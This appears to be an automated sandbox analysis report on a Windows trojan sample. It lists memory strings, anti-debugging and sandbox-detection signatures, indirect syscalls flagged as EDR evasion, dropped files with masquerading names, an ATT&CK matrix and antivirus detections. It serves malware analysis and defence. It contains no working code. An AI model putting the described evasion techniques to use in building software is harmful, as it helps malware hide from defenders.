      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3339978275.000003647E3FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processoril*
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partition
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorr
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3313848485.00000364802F0000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313061932.00000364802EF000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3343760698.0000036484160000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3308693534.00000364841FF000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3308693534.000003648417C000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.000000000043C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3294020112.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3292258197.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3292414248.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3293610346.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3292843649.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3293235117.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3293637453.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3293070325.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3293417532.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3292568921.000001DDB10D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Contex
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3286346506.000001DDAF825000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3287052376.000001DDAF813000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3285409687.000001DDAF81D000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3285823267.000001DDAF825000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3285444763.000001DDAF828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupt
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3292954658.000001DDB103A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 46I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V bwygjysogxfytqn Bus Pipes
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorc.dllc
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3339978275.000003647E3FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipess
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.000000000043C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP[G%SystemRoot%\system32\mswsock.dll+
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3333215380.0000036484265000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3291967799.000001DDB107A000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3292997718.000001DDB1085000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3293685909.000001DDB1085000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitec
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipesd
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.000000000043C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition%
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3287052376.000001DDAF813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot42M
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3291826667.000001DDB1038000.00000004.00000020.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3292954658.000001DDB103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot con O
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3304216830.00000364821CB000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3313077548.000003647E2EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3339978275.000003647E3FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeThread information set: HideFromDebuggerJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeProcess queried: DebugObjectHandleJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF6ED390 RtlAddVectoredExceptionHandler,SetThreadStackGuarantee,GetLastError,7_2_00007FF7AF6ED390
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Found direct / indirect Syscall (likely to bypass EDR)
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeNtQuerySystemInformation: Indirect: 0x1409E757CJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeNtQueryInformationProcess: Indirect: 0x1409A2637Jump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeNtQueryInformationProcess: Indirect: 0x1409A24C9Jump to behavior
      Source: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exeNtSetInformationThread: Indirect: 0x140AB95E2Jump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeProcess created: C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe "C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe"Jump to behavior
      Source: 4LX9x1PMAW.exe, 00000000.00000003.3335035446.000003648441F000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3339978275.000003647E3FF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\4LX9x1PMAW.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Windows\svhost.exeCode function: 7_2_00007FF7AF72A64C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00007FF7AF72A64C

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      Windows Service      		1
      Windows Service      		1
      Masquerading      		OS Credential Dumping1
      Network Share Discovery      		Remote Services1
      Archive Collected Data      		2
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter      		1
      Registry Run Keys / Startup Folder      		12
      Process Injection      		32
      Virtualization/Sandbox Evasion      		LSASS Memory1
      System Time Discovery      		Remote Desktop ProtocolData from Removable Media11
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      Abuse Elevation Control Mechanism      		1
      Disable or Modify Tools      		Security Account Manager721
      Security Software Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      Registry Run Keys / Startup Folder      		12
      Process Injection      		NTDS32
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		LSA Secrets2
      Process Discovery      		SSHKeylogging2
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Abuse Elevation Control Mechanism      		Cached Domain Credentials15
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
      Obfuscated Files or Information      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
      Software Packing      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      DLL Side-Loading      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      4LX9x1PMAW.exe12%VirustotalBrowse
      4LX9x1PMAW.exe21%ReversingLabsWin64.Trojan.Generic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe100%AviraHEUR/AGEN.1309090
      C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Windows\WinRing0x64.sys5%ReversingLabs
      C:\Users\user\AppData\Local\Windows\svhost.exe21%ReversingLabsWin64.Trojan.Generic
      C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe38%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://ocsp.cloudflare.com/origin_ca00%Avira URL Cloudsafe
      http://crl.cloudflare.com/origin_ca.crl00%Avira URL Cloudsafe
      http://crl.cloudflare.com/origin_ca.crlxF0%Avira URL Cloudsafe
      http://crl.cloudflare.com/origin_ca.crlS0%Avira URL Cloudsafe
      https://wns.windows.com/e0%Avira URL Cloudsafe
      http://crl.cloudflare.com/origin_ca.crl0%Avira URL Cloudsafe
      https://docs.rs/getrandom#nodejs-es-module-support0%Avira URL Cloudsafe
      http://ocsp.cloudflare.com/origin_ca0%Avira URL Cloudsafe
